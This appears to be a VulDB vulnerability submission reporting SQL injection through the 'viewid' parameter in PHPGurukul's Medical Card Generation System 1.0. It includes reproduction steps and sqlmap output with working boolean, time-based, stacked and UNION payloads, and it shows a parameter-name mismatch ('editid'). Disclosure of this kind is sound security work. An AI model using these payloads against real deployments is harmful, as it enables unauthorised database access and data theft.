제출 #427404: PHPGurukul Medical Card Generation System - viewid Parameter V1.0 SQL Injection정보

제목PHPGurukul Medical Card Generation System - viewid Parameter V1.0 SQL Injection
설명I would like to report a SQL injection vulnerability I discovered in the phpgurukul of the Medical Card Generation System during my testing. Details: Affected URL/Endpoint: /mcgs/admin/view-card-detail.php?viewid=1, /mcgs/admin/view-enquiry.php?viewid=1 Vulnerable Parameter: 'viewid' Risk Level: High (allows malicious users to execute arbitrary SQL queries) Steps to reproduce: 1) Sign in as admin. 2) Navigate to Managecard > Action 'View' 3) Use a proxy like burpsuite to intercept the request. 4) Input the payload to invoke the SQL injection. sqlmap resumed the following injection point(s) from stored session: --- Parameter: editid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: editid=1 AND 3139=3139 Type: stacked queries Title: MySQL >= 5.0.12 stacked queries (comment) Payload: editid=1;SELECT SLEEP(5)# Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: editid=1 AND (SELECT 5373 FROM (SELECT(SLEEP(5)))VtOj) Type: UNION query Title: Generic UNION query (NULL) - 14 columns Payload: editid=1 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162717071,0x644d46485475624f4c745a70576f686b4152677175556968674b494d6145446b624a597163747477,0x7178706b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- - --- [11:02:51] [INFO] the back-end DBMS is MySQL [11:02:51] [INFO] fetching banner web application technology: Apache 2.4.59, PHP 8.2.18 back-end DBMS: MySQL >= 5.0.12 banner: '8.3.0' [11:02:51] [INFO] fetching current user current user: 'root@localhost' [11:02:51] [INFO] fetching current database current database: 'mgsdb' Please let me know if you need further information or a more detailed analysis.
사용자
 Delvy (UID 74555)
제출2024. 10. 21. AM 05:03 (2 연령 ago)
모더레이션2024. 10. 23. PM 01:05 (2 days later)
상태수락
VulDB 항목281567 [PHPGurukul Medical Card Generation System 1.0 View Enquiry Page /admin/view-enquiry.php viewid SQL 주입]
포인트들17

이전개요다음

Interested in the pricing of exploits?

See the underground prices here!